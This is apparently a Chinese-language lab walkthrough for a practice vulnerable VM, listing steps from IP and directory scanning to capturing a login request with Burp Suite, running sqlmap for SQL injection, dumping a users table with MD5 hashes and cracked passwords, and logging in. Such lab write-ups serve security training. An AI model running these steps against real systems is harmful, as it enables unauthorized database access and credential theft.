第一步:打开靶机
第二步:查看虚拟靶机ip
、
第三步:查看连接80端口的ip
第四步:扫描出靶机的ip地址
第五步:扫描靶机地址下的目录
访问login.php目录
点击注册
点击,可以看到许多的书名
第六步:使用burpsuite抓包
在111后面加*号
保存抓到的文件为post.txt
第七步:使用sqlmap
查数据库
python3 sqlmap.py -r 文件路径 --current-db --batch
查看表名
查看敏感信息
+----+--------------+------------+----------------+---------------------------------------------+
| id | name | user | address | pasword |
+----+--------------+------------+----------------+---------------------------------------------+
| 1 | David | user1 | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello) |
| 2 | Beckham | user2 | Kensington | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3 | anonymous | user3 | anonymous | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test | testaddress | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin | superadmin | superadmin | 2386acb2cf356944177746fc92523983 |
| 12 | test1 | test1 | test1 | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | csl | sloane | jkvs | e10adc3949ba59abbe56e057f20f883e (123456) |
+----+--------------+------------+----------------+---------------------------------------------+
解密密码
第八步:使用查到的用户名密码登录